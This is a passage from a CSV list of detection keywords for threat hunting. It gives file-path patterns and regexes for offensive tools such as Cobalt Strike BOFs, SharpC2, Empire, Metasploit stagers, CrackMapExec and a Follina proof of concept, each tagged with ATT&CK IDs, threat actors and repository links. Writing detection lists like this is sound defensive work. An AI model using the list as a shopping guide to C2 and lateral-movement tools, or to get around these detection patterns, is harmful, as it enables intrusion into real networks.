Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/CIMplant.exe*",".{0,1000}\/CIMplant\.exe.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*/CIMplant.git*",".{0,1000}\/CIMplant\.git.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*/CIMplant/Commander.cs*",".{0,1000}\/CIMplant\/Commander\.cs.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*/citrix-brute-xml.nse*",".{0,1000}\/citrix\-brute\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/citrix-enum-apps.nse*",".{0,1000}\/citrix\-enum\-apps\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/citrix-enum-apps-xml.nse*",".{0,1000}\/citrix\-enum\-apps\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/citrix-enum-servers.nse*",".{0,1000}\/citrix\-enum\-servers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/citrix-enum-servers-xml.nse*",".{0,1000}\/citrix\-enum\-servers\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/clamav-exec.nse*",".{0,1000}\/clamav\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cleantracks.ps1",".{0,1000}\/cleantracks\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/clickme.docx*",".{0,1000}\/clickme\.docx.{0,1000}","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","106","29","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" "*/client/beef.js*",".{0,1000}\/client\/beef\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/client/bof/*.asm*",".{0,1000}\/client\/bof\/.{0,1000}\.asm.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*/Client/Commands/Enumeration.yaml*",".{0,1000}\/Client\/Commands\/Enumeration\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Commands/Execution.yaml*",".{0,1000}\/Client\/Commands\/Execution\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Commands/Injection.yaml*",".{0,1000}\/Client\/Commands\/Injection\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Commands/Lateral.yaml*",".{0,1000}\/Client\/Commands\/Lateral\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Commands/Tokens.yaml*",".{0,1000}\/Client\/Commands\/Tokens\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/client/generated-stagers/*",".{0,1000}\/client\/generated\-stagers\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/Client/Pages/Drones.razor*",".{0,1000}\/Client\/Pages\/Drones\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Pages/Payloads.razor*",".{0,1000}\/Client\/Pages\/Payloads\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/Client/Pages/Pivots.razor*",".{0,1000}\/Client\/Pages\/Pivots\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/clipboardinject.*",".{0,1000}\/clipboardinject\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/clipboardinject/*",".{0,1000}\/clipboardinject\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" 
"*/ClipboardMITM.py*",".{0,1000}\/ClipboardMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/clipmon/clipmon.sln*",".{0,1000}\/clipmon\/clipmon\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/clipmon/dll/*",".{0,1000}\/clipmon\/dll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/CloakNDaggerC2*",".{0,1000}\/CloakNDaggerC2.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","11","2","2024-04-26T19:45:06Z","2023-04-28T01:58:18Z" "*/clock-skew.nse*",".{0,1000}\/clock\-skew\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cloud_enum.git*",".{0,1000}\/cloud_enum\.git.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "*/cloud_enum.py*",".{0,1000}\/cloud_enum\.py.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "*/cloud_enum.txt*",".{0,1000}\/cloud_enum\.txt.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. 
Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "*/cloudbrute.yaml*",".{0,1000}\/cloudbrute\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/cloudsploit.git*",".{0,1000}\/cloudsploit\.git.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","3180","651","2024-05-01T18:06:46Z","2015-06-29T15:33:40Z" "*/clown-newuser.c*",".{0,1000}\/clown\-newuser\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/cmd/c2.go*",".{0,1000}\/cmd\/c2\.go.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*/cmd/hades/*",".{0,1000}\/cmd\/hades\/.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*/cmd/reverst/*",".{0,1000}\/cmd\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*/cmd_executor/*.go*",".{0,1000}\/cmd_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/cmd_log.txt*",".{0,1000}\/cmd_log\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/cmd_stager*",".{0,1000}\/cmd_stager.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/CmdLineSpoofer.git*",".{0,1000}\/CmdLineSpoofer\.git.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*/CmdLineSpoofer/*.cs*",".{0,1000}\/CmdLineSpoofer\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*/cmdstager/*",".{0,1000}\/cmdstager\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/cme smb *",".{0,1000}\/cme\ssmb\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/cme winrm *",".{0,1000}\/cme\swinrm\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/cme_adcs_output_*.txt*",".{0,1000}\/cme_adcs_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/cme_shares_output_*",".{0,1000}\/cme_shares_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/cme_spooler_output_*",".{0,1000}\/cme_spooler_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" 
